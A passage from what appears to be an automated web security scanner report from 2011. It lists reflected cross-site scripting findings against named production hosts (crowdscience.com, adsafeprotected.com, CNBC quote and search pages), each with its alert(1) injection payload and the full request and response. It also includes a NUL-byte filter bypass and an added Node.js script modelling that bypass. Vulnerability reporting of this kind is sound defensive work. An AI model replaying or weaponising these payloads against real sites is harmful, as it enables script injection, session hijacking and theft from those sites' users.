function ChangePage(roForm,rnCurrentPage){roForm.nStart.options[rnCurrentPage].selected=true;roForm.submit();}

/*

...[SNIP]...
ocID="+rnLocID+"&cii_nRGID=1964&cii_nPGID=0&cii_nRadius=15";document.location = sUrl;}
function cii_ShowLocations(rnSCID,rnCTID,rnVID,rnLocID,rnStoreID,rnVStoreID,rnColPos){var sUrl="?upc=04740009897894563";alert(1)//be0c49fb5ff&cii_nSCID="+rnSCID+"&cii_nCTID="+rnCTID+"&cii_sZip=&cii_nIID=163810295&cii_sSKU="+escape("047400098978").replace("+","%2B")+"&cii_nVID="+rnVID+"&cii_nLocID="+rnLocID+"&cii_nStoreID="+rnStoreID+"&cii_n
...[SNIP]...

3.59. http://ping.crowdscience.com/ping.js [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /ping.js

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %006c87d'%3balert(1)//7d11b67251b was submitted in the m parameter. This input was echoed as 6c87d';alert(1)//7d11b67251b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is defended by a web application firewall (WAF) written in native code, where strings are NULL-terminated: the filter stops reading at the %00, while the application behind it, whose strings carry an explicit length, processes everything that follows. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ping.js?url=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&id=5c5c650d27&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F535.1%20(khtml%2C%20like%20gecko)%20chrome%2F13.0.782.220%20safari%2F535.1&x=1315341159227&c=0&t=0&v=0&m=0%006c87d'%3balert(1)//7d11b67251b&vn=2.0.4 HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __csadt_="NSBE647001:|fixed_placement||52487714041||0||1||1"; __csv=2a31db5320bf2a6b

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:33:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=53404c51af1f5e49; Domain=.crowdscience.com; expires=Mon, 05 Dec 2011 15:33:02; Path=/
Content-Length: 8035
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain


(function (){

var cs = CrowdScience;

cs.state = 1; // cs.states.ping_loading;

cs.invitation_beforeShow = function() {};
cs.invitation_afterShow = function() {};

cs.i
...[SNIP]...
f5524dcb2c411c47c&vguid=53404c51af1f5e49&sc=eNotjEEOwjAMBP/icxTZ3tiO8xtUhOBURIs4IP5OKnVPc5jZLz0/NKRyoff9sW80oECE1QyzFFZkoW25ndJledEw5oOv62R4heicNFEGZyu07CuNqTA3tc4yj6CR4q6Fjki9uvZEWkTL9I7fH93NH90=&m=0.6c87d';alert(1)//7d11b67251b&style=' + self.style;
return self;
})();


CrowdScience.imageUrls = [
'http://static.crowdscience.com/invlogo/dir02/logo_2_59cd36bf0aee
...[SNIP]...
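The remediation note for 3.59 attributes the %00 bypass to a filter written in native code, where a string ends at the first NUL byte. The Node.js script below is an added example and is not code from this report, from crowdscience.com or from any WAF vendor. It percent-decodes the m parameter from the request above into bytes, models the native filter's view of that buffer by truncating it at the first 0x00 (the semantics of strlen and strstr, not a real product), and contrasts that with a length-aware filter and with what a managed-runtime application receives. The blocklist of characters is an assumption; the report does not say which characters were being blocked.

```javascript
// Added example (not from the report): the %00 filter bypass from 3.59, modelled
// end to end. Percent-decode once, then compare three views of the same bytes.

// The m parameter exactly as it appears in the 3.59 request line.
const RAW_M_WITH_NUL = "0%006c87d'%3balert(1)//7d11b67251b";
// Same payload with the NUL removed, constructed here for comparison.
const RAW_M_WITHOUT_NUL = "06c87d'%3balert(1)//7d11b67251b";

// Assumed blocklist; the report does not say which characters the filter blocked.
const BLOCKED_CHARS = ["'", '"', ";", "<", ">"];

// Percent-decode a query value into its raw bytes. Both the filter and the
// application must do this before the quote and semicolon become visible.
function percentDecodeToBytes(raw) {
  const out = [];
  for (let i = 0; i < raw.length; i++) {
    const hex = raw.slice(i + 1, i + 3);
    if (raw[i] === "%" && /^[0-9a-fA-F]{2}$/.test(hex)) {
      out.push(parseInt(hex, 16));
      i += 2;
    } else {
      out.push(raw.charCodeAt(i) & 0xff);
    }
  }
  return Uint8Array.from(out);
}

function bytesToLatin1(bytes) {
  return String.fromCharCode.apply(null, Array.from(bytes));
}

// Model of a filter written in C that treats the decoded buffer as a
// NUL-terminated string: every byte after the first 0x00 is invisible to it.
// This reproduces strlen()/strstr() semantics only; it is not a vendor's code.
function nativeFilterView(bytes) {
  const nul = bytes.indexOf(0);
  return nul === -1 ? bytes : bytes.subarray(0, nul);
}

function blockedByNativeFilter(raw) {
  const visible = bytesToLatin1(nativeFilterView(percentDecodeToBytes(raw)));
  return BLOCKED_CHARS.some((ch) => visible.includes(ch));
}

// Length-aware filter: inspects every decoded byte and also rejects the NUL
// itself, which has no legitimate place in a query parameter.
function blockedByLengthAwareFilter(raw) {
  const all = bytesToLatin1(percentDecodeToBytes(raw));
  return all.includes("\u0000") || BLOCKED_CHARS.some((ch) => all.includes(ch));
}

// What the application behind the filter receives: length-counted string
// runtimes keep the bytes after the NUL, so the quote and semicolon survive
// and are reflected into the script, as the 3.59 response shows.
function applicationSees(raw) {
  return bytesToLatin1(percentDecodeToBytes(raw));
}

console.log("without %00, native filter blocks:", blockedByNativeFilter(RAW_M_WITHOUT_NUL));
console.log("with %00,    native filter blocks:", blockedByNativeFilter(RAW_M_WITH_NUL));
console.log("with %00,    length-aware blocks:  ", blockedByLengthAwareFilter(RAW_M_WITH_NUL));
console.log("application reflects:", JSON.stringify(applicationSees(RAW_M_WITH_NUL)));
```

The native-filter model blocks the payload when no NUL precedes the quote and lets the identical bytes through once a %00 is inserted, while the application sees the full decoded value either way. That divergence between two parsers of the same request is the whole bypass; the fix belongs in the application's output encoding, with the WAF rule treated only as defence in depth.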

3.60. http://pixel.adsafeprotected.com/jspix [anId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 510c5"-alert(1)-"dd817178b4e was submitted in the anId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144510c5"-alert(1)-"dd817178b4e&pubId=4749&campId=176996 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=81B90065048D4370292026025CE18CDC; Path=/
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:05:42 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144510c5"-alert(1)-"dd817178b4e&pubId=4749&campId=176996",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsrdhvt9"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var
...[SNIP]...

3.61. http://pixel.adsafeprotected.com/jspix [campId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da845"-alert(1)-"880f48e2e1c was submitted in the campId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=4749&campId=176996da845"-alert(1)-"880f48e2e1c HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=35EB1F19FAC898AF05DFBC3B925C5071; Path=/
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:05:42 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=4749&campId=176996da845"-alert(1)-"880f48e2e1c",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsrdhw0z"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"info",LOG:"log",
...[SNIP]...

3.62. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29f17"-alert(1)-"0d89877785d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=4749&campId=176996&29f17"-alert(1)-"0d89877785d=1 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FB69FF41E9D06173F3B7D3D9C3729F77; Path=/
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:05:42 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=4749&campId=176996&29f17"-alert(1)-"0d89877785d=1",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsrdhw3w"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"info",LOG:"log
...[SNIP]...

3.63. http://pixel.adsafeprotected.com/jspix [pubId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b063c"-alert(1)-"1e31f51b3df was submitted in the pubId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=4749b063c"-alert(1)-"1e31f51b3df&campId=176996 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=15F3A88A83B937D289F19131BE7257D4; Path=/
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:05:41 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=4749b063c"-alert(1)-"1e31f51b3df&campId=176996",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsrdhvsx"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"in
...[SNIP]...

3.64. http://quote.cnbc.com/quote-html-webservice/quote.htm [&symbols parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://quote.cnbc.com
Path:   /quote-html-webservice/quote.htm

Issue detail

The value of the &symbols request parameter is copied into the HTML document as plain text between tags. The payload 4f61d<img%20src%3da%20onerror%3dalert(1)>e62cc5d307c was submitted in the &symbols parameter. This input was echoed as 4f61d<img src=a onerror=alert(1)>e62cc5d307c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quote-html-webservice/quote.htm?&symbols=.GDAXI|4f61d<img%20src%3da%20onerror%3dalert(1)>e62cc5d307c&requestMethod=quick&noform=1&realtime=1&client=flexQuote&output=json&random=1315338996212 HTTP/1.1
Host: quote.cnbc.com
Proxy-Connection: keep-alive
Referer: http://quote.cnbc.com/quoteproxy.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/x-json;charset=UTF-8
Content-Language: en-US
Date: Tue, 06 Sep 2011 14:57:30 GMT
Via: 1.1 C aicache6
Content-Length: 980
X-Aicache-OS: 64.210.195.136:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 14:57:35 GMT


{"QuickQuoteResult":{"QuickQuote":[{"change_pct":"-1.61","last":"5161.68","curmktstatus":"REG_MKT","change":"-84.50","reg_last_time":"2011-09-06T16:42:29.000+0200","timeZone":"ECT","last_time":"
...[SNIP]...
"false","altSymbol":"DAX-XE","volume":"189930268","todays_closing":"0.0","previous_day_closing":"5246.18","high":"5332.11","low":"5150.05","comments":"ILX","last_time_msec":"1315320149000"},{"symbol":"4F61D<IMG SRC=A ONERROR=ALERT(1)>E62CC5D307C","code":"1"}],"xmlns:xsi":"http://www.w3.org/2001/XMLSchema-instance","xmlns":"http://quote.cnbc.com/services/MultiQuote/2006"}}

3.65. http://search.cnbc.com/main.do [keywords parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

The value of the keywords request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ae86</script><script>alert(1)</script>06ada94b268662ae5 was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main.do?target=all&keywords=xss4ae86</script><script>alert(1)</script>06ada94b268662ae5&categories=exclude&searchboxinput=xss HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
Origin: http://www.cnbc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; adops_master_kvs=; snas_noinfo=1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:47 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 84843
X-Aicache-OS: 64.210.194.245:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:47 GMT

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss4ae86</script>
...[SNIP]...
<script>

keyWordParam = "xss4ae86</script><script>alert(1)</script>06ada94b268662ae5";
keyWordParam = keyWordParam.replace(/&quot;/g,'"');
document.getElementById('txtBox').value = keyWordParam;

</script>
...[SNIP]...

3.66. http://search.cnbc.com/main.do [keywords parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

The value of the keywords request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86fbc</script><script>alert(1)</script>0a30be6899a was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main.do?keywords=xss86fbc</script><script>alert(1)</script>0a30be6899a&sort=date&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:51 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 85231
X-Aicache-OS: 64.210.194.247:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:51 GMT

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss86fbc</script>
...[SNIP]...
<script>

keyWordParam = "xss86fbc</script><script>alert(1)</script>0a30be6899a";
keyWordParam = keyWordParam.replace(/&quot;/g,'"');
document.getElementById('txtBox').value = keyWordParam;

</script>
...[SNIP]...

3.67. http://search.cnbc.com/main.do [keywords parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

The value of the keywords request parameter is copied into the HTML document as text between TITLE tags. The payload 8364e</title><script>alert(1)</script>07d9d84cea13b502c was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /main.do?target=all&keywords=xss8364e</title><script>alert(1)</script>07d9d84cea13b502c&categories=exclude&searchboxinput=xss HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
Origin: http://www.cnbc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; adops_master_kvs=; snas_noinfo=1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:51 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 84839
X-Aicache-OS: 64.210.193.97:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:51 GMT

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss8364e</title><
...[SNIP]...
<title>xss8364e</title><script>alert(1)</script>07d9d84cea13b502c - CNBC</title>
...[SNIP]...

3.68. http://search.cnbc.com/main.do [keywords parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

The value of the keywords request parameter is copied into the HTML document as text between TITLE tags. The payload fda4e</title><script>alert(1)</script>b2e6faa4271 was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main.do?keywords=xssfda4e</title><script>alert(1)</script>b2e6faa4271&sort=date&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:54 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 85227
X-Aicache-OS: 64.210.194.245:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:54 GMT

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xssfda4e</title><
...[SNIP]...
<title>xssfda4e</title><script>alert(1)</script>b2e6faa4271 - CNBC</title>
...[SNIP]...

3.69. http://search.cnbc.com/main.do [pubfreq parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

The value of the pubfreq request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cf8c"><script>alert(1)</script>c96a087baf9 was submitted in the pubfreq parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main.do?keywords=xss&sort=date&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h8cf8c"><script>alert(1)</script>c96a087baf9 HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:59 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 85676
X-Aicache-OS: 64.210.194.246:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:59 GMT

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss">
<meta name=
...[SNIP]...
e="keywords" type="text" style="width:100px" height="22px" class="search_input" onkeypress="javascript: return cnbc_searchbox_submitenter(document.getElementById('txtBox').value,'date',formatParam,0,'h8cf8c"><script>alert(1)</script>c96a087baf9',event);" maxlength="100"/>
...[SNIP]...

3.70. http://search.cnbc.com/main.do [pubfreq parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

